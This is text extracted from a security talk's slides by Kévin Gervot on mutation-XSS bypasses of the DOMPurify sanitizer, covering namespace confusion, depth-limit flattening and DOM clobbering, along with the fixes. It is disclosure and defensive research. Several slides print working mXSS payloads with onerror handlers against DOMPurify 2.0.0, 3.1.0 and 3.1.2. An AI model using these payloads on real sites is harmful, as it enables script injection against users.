Kévin GERVOT
2/55
Kévin GERVOT
A security feature or tool used to clean HTML content by removing or altering potentially dangerous elements, attributes, or scripts, thereby preventing cross-site scripting (XSS) and other code injection attacks.
Source: ChatGPT 🤫
3/55
Kévin GERVOT
4/55
parse HTML
sanitize Elements
sanitize Attributes
serialize HTML
sanitize Shadow DOM
Highly simplified version of the DOMPurify logic
HTML string
HTML string
①
②
③
④
⑤
Kévin GERVOT
5/55
It is possible that the output of this algorithm, if parsed with an HTML parser, will not return the original tree structure.
[...]
Kévin GERVOT
6/55
Dom Tree
<form>
<div>
<form>
<form>
<div></form>
<form>
</form>
html
xhtml
xhtml
xhtml
Dom Tree
<form>
<div>
xhtml
xhtml
xhtml
What the sanitizer sees
What the DOM sees
Kévin GERVOT
7/55
<style><a>
Dom Tree
<style><a>
xhtml
html
xhtml
<svg><style><a>
Dom Tree
<svg>
<style>
<a>
svg
svg
html
svg
<math><style><a>
Dom Tree
<math>
<style>
<a>
mathml
mathml
html
mathml
text
node
node
Kévin GERVOT
8/55
List of MathML text integration points:
<mi> | <mo> | <mn> | <ms> | <mtext>
List of HTML integration points:
<annotation-xml>
<foreignObject>
<desc>
<title>
<svg><title><a>
Dom Tree
<svg>
<title>
<a>
html
svg
svg
xhtml
We can switch from SVG to HTML!
Kévin GERVOT
9/55
<svg></p><style><a id="</style><img src=x onerror=x>">
DOMPurify 2.0.0
<svg>
<p>
html
<style>
<a id="</style>XSS">
.innerHTML
<svg>
svg
<p>
xhtml
<style><a id="</style>
<img src=x onerror=x>">
(Found by @SecurityMB)
xhtml
xhtml
svg
svg
svg
svg
The <style> tag falls into the HTML namespace, changing its content from a node to text.
Kévin GERVOT
10/55
Kévin GERVOT
11/55
The algorithm described below places no limit on the depth of the DOM tree generated, or on the length of tag names, attribute names, attribute values, Text nodes, etc.
Kévin GERVOT
12/55
Language | Library | Nested node limit | Handling |
---|---|---|---|
C | libxml2 | 255 | Removing |
Javascript | parse5 | No limit? | - |
Python | html.parser | No limit? | - |
Java | Jsoup | No limit? | - |
Browser | DOMParser | 512 | Flattening |
Kévin GERVOT
13/55
<div*509><svg><style>
Dom Tree
<div*509>
<svg>
<style>
xhtml
svg
<div*510><svg><style>
Dom Tree
<div*510>
<svg>
<style>
html
xhtml
svg
svg
svg
html
Kévin GERVOT
14/55
<a><a>
Dom Tree
<a>
xhtml
svg
<div*509><a><svg><a>
Dom Tree
<div*509>
<a>
<svg>
<a>
html
xhtml
xhtml
svg
<a>
xhtml
svg
html
Kévin GERVOT
15/55
13.2.4 Parse state ............................................................. 1279
13.2.4.1 The insertion mode ................................. 1279
13.2.4.2 The stack of open elements .................. 1280
13.2.4.3 The list of active formatting elements..... 1282
13.2.4.4 The element pointers ................................ 1283
13.2.4.5 Other parsing state flags........................... 1283
Source: HTML Specification.
Kévin GERVOT
16/55
The insertion mode is a state variable that controls the primary operation of the tree construction stage.
Initially, the insertion mode is "initial". It can change to "before html" [...] "after after frameset" during the course of the parsing [...]. The insertion mode affects how tokens are processed [...].
Kévin GERVOT
17/55
The user agent must handle the token as follows:
[...]
↳ A start tag whose tag name is one of: "caption" [...]
[...]
Pop elements from this stack until a caption element has been popped from the stack.
Kévin GERVOT
18/55
The stack grows downwards; the topmost node on the stack is the first one added to the stack, and the bottommost node of the stack is the most recently added node in the stack [...].
<table>
<caption>
<div>1</div>
<div>2</div>
</caption>
</table>
html
Kévin GERVOT
19/55
<table>
<caption>
<div>1</div>
<caption></caption>
<div>2</div>
</caption>
</table>
Dom Tree
<div>2</div>
<table>
<div>1</div>
xhtml
xhtml
<caption>
xhtml
<caption>
xhtml
xhtml
html
Kévin GERVOT
20/55
<table><caption>
<svg>
<title>
<caption></caption>
</title>
<style><a id="</style><img src onerror=x"></a></style>
</svg>
</caption></table>
Dom Tree
<table>
xhtml
<caption>
xhtml
<svg>
svg
<title>
svg
<caption>
xhtml
<style><a id="</style>
html
<img src=x onerror=x><
xhtml
xhtml
It can even traverse namespaces!
Kévin GERVOT
21/55
[...]
↳ Anything else
Process the token using the rules for the "in body" insertion mode.
Kévin GERVOT
22/55
<table><caption><table><caption>
Dom Tree
<table>
xhtml
svg
svg
<div*508>
<table><caption><table><caption>
Dom Tree
<div*508>
<table>
<caption>
<table>
html
xhtml
xhtml
xhtml
<caption>
<caption>
<table>
xhtml
<caption>
xhtml
xhtml
xhtml
xhtml
html
Nested <caption> through node flattening!
Kévin GERVOT
23/55
<div*506>
<table><caption>
<svg>
<title>
<table><caption></caption></table>
</title>
<style><a id="</style><img src onerror=x>"></a></style>
</svg>
</caption></table>
DOMPurify 3.1.0
<div*506>
<table>
xhtml
xhtml
<caption>
xhtml
<svg>
<title>
svg
<table>
<caption>
xhtml
<style>
<a id="[...]">
html
svg
xhtml
svg
svg
Kévin GERVOT
24/55
.innerHTML
<div*506>
<img src onerror=x>">
xhtml
xhtml
<table>
xhtml
<caption>
xhtml
<svg>
svg
<title>
svg
<table>
xhtml
<caption>
<style><a id="</style>
xhtml
xhtml
Kévin GERVOT
25/55
Kévin GERVOT
26/55
1. The nested nodes limit is set to 252
currentNode.__depth = currentNode.parentNode.__depth + 1;
/* Remove an element if nested too deeply to avoid mXSS */
if (currentNode.__depth >= MAX_NESTING_DEPTH) {
_forceRemove(currentNode);
}
Highly simplified version of the DOMPurify 3.1.1 fix
Kévin GERVOT
27/55
2. DOM Clobbering protection
elm instanceof HTMLFormElement && (
typeof elm.__depth !== 'undefined' &&
typeof elm.__depth !== 'number'
)
Highly simplified version of the DOMPurify 3.1.1 fix
Kévin GERVOT
28/55
»
x
»
y.
<div id="x">
<form id="y">
<input name="z">
</form>
</div>
z
html
← <div [...]>
← <input [...]>
Kévin GERVOT
29/55
»
f.
← <input name="pare[..]">
»
f.
← undefined
<div>
<form id="f">
<input name="parentNode">
</form>
</div>
parentNode
parentNode.
__depth
html
currentNode.__depth = currentNode.parentNode.__depth + 1;
Kévin GERVOT
30/55
<div*200><form><input name="parentNode"><div*200>
DOMPurify 3.1.1
<div*200>
html
xhtml
<form>
xhtml
<input>
xhtml
<div*200>
xhtml
Kévin GERVOT
31/55
html
<div*200>
<form>
<input name="parentNode">
<div*200>
<form></form><form>
<input name="parentNode">
<div*105>
DOMPurify 3.1.0 Bypass
Kévin GERVOT
32/55
Kévin GERVOT
33/55
<svg><title><a>
DOMPurify 3.1.2
<svg>
html
svg
<title>
svg
1. Access .parentNode using the getter.
2. Block SVG-to-HTML namespace switch.
const HTML_INTEGRATION_POINTS = ['foreignobject', 'annotation-xml'];
Highly simplified version of the DOMPurify 3.1.2 fix
Kévin GERVOT
34/55
»
x.
<form id="x"></form>
<input form="y" name="z">
id=
html
← "y"
»
x.
z
← undefined
»
y.
z
← <input [...] name="z">
"y"
Kévin GERVOT
35/55
<div id="a "></div>
DOMPurify 3.1.2
<a id="a">
html
xhtml
Kévin GERVOT
36/55
<form id="a "><div*500></div*500></form>
<input form="a" name="__depth">
DOMPurify 3.1.2
<form id="a">
html
xhtml
<div*500>
xhtml
<input name="__depth">
xhtml
For some obscure reason, it doesn't work on Firefox :(
Kévin GERVOT
37/55
... FUZZING!
Kévin GERVOT
38/55
<x><y><z>
<button>
<z>
<button></button>
</z>
</button>
<style></style>
</z></y></x>
DOM Tree
<x>
<y>
xhtml
xhtml
<z>
xhtml
<button>
xhtml
<z>
<button>
<style>
xhtml
html
xhtml
xhtml
<button> can be <dd>, <dt>, <li> or <table>
Kévin GERVOT
39/55
<x><y><z>
<button>
<x>
<button></button>
</x>
</button>
<style></style>
</z></y></x>
DOM Tree
<x>
<y>
xhtml
xhtml
<z>
xhtml
<button>
xhtml
<x>
<button>
<style>
xhtml
html
xhtml
xhtml
<button> can be <dd>, <dt>, <li> or <table>
Kévin GERVOT
40/55
<svg><y><title><z>
<button>
<y><z>
<button></button>
</z></y>
</button>
<style></style>
</z></title></y></svg>
DOM Tree
<svg>
<y>
svg
<title>
svg
svg
<style>
html
It can even traverse namespaces!
[Elevator]
xhtml
svg
svg
<z>
xhtml
Kévin GERVOT
41/55
const COMMON_SVG_AND_HTML_ELEMENTS = addToSet({}, [
'title',
'style',
'font',
'a',
'script',
]);
Source: DOMPurify - /src/purify.js.
Kévin GERVOT
42/55
Can't switch from SVG namespace to HTML namespace...
Kévin GERVOT
43/55
Can't switch from SVG namespace to HTML namespace...
... FUZZING!
Kévin GERVOT
44/55
<x><svg>
<image><x>
<title>
<image></image>
</title>
</x></image>
<style></style>
</svg></x>
DOM Tree
<x>
<svg>
xhtml
svg
<image>
svg
<x>
svg
<image>
<style>
xhtml
html
Browser <image> to <img> conversion works too!
<title>
svg
svg
Kévin GERVOT
45/55
<div*507>
<svg>
<image>
<title>
<svg>
<image></image>
</svg>
</title>
</image>
</svg>
DOM Tree
<div*507>
<svg>
xhtml
svg
<image>
svg
<title>
svg
<image>
html
svg
<svg>
svg
Even if we use HTML integration points, we do not switch to HTML :)
46/55
<form id="x ">
<div*504>
<a><svg>
<image>
<a><title>
<svg><image></image></svg>
</title></a>
</image>
<style><a id="</style><img src=x onerror=x>"></a></style>
</svg></a>
<input form="x" name="__depth">
DOMPurify 3.1.2
<form id="x">
<div*504>
xhtml
xhtml
<a>
xhtml
<svg>
xhtml
<image>
svg
<a>
svg
<title>
<svg>
<image>
html
<style>
<a>
<input name="_depth">
svg
svg
svg
svg
svg
xhtml
Kévin GERVOT
.innerHTML
<form id="x">
<div*504>
xhtml
xhtml
<a>
xhtml
<svg>
xhtml
<image>
svg
<a>
svg
<title>
<svg>
<img>
<style><a id="</style>
<img src onerror=x>">
<input name="_depth">
svg
svg
xhtml
xhtml
xhtml
xhtml
Kévin GERVOT
48/55
Kévin GERVOT
49/55
function sanitizeMore(txt) {
return DOMPurify.sanitize(txt);
}
text = DOMPurify.sanitize(sanitizeMore(text, config), config);
Highly simplified version of the Mermaid.js sanitizing process.
Kévin GERVOT
50/55
${"<form><h1></form><table><form></form></table></form></table></h1></form>".repeat(510)}
<math>
<mi>
<style><!--</style>
<style id="--></style></mi></math><img src=x onerror=x>"></style>
</mi>
</math>
DOMPurify 3.1.2
<form>
<h1>
xhtml
<table>
<form>
"mXSS payload"
mathml
<math>
mathml
html
xhtml
xhtml
xhtml
x510
Depth of 4
Kévin GERVOT
.innerHTML
<form>
<h1>
xhtml
<table>
<form>
<table>
<h1>
xhtml
xhtml
xhtml
<math>
<mi>
New depth = nb of patterns = 510
mathml
<style><!--</style>
<style id="-->XSS"></style>
xhtml
xhtml
[...]
xhtml
mathml
xhtml
xhtml
Kévin GERVOT
.innerHTML
<form>
<h1>
xhtml
<table>
<h1>
<table>
xhtml
xhtml
xhtml
<math>
<mi>
mathml
<style><!--[...]--></style>
<img src=x onneror=x>"<
xhtml
xhtml
xhtml
[...]
mathml
mathml
52/55
Kévin GERVOT
53/55
Kévin GERVOT
if (regExpTest(/((--!?|])>)|<\/(style|title)/i, value)) {
_removeAttribute(name, currentNode);
continue;
}
Highly simplified version of the DOMPurify 3.1.3 fix
<div id="-->"></div>
DOMPurify 3.1.2
<div>
html
xhtml
Kévin GERVOT
55/55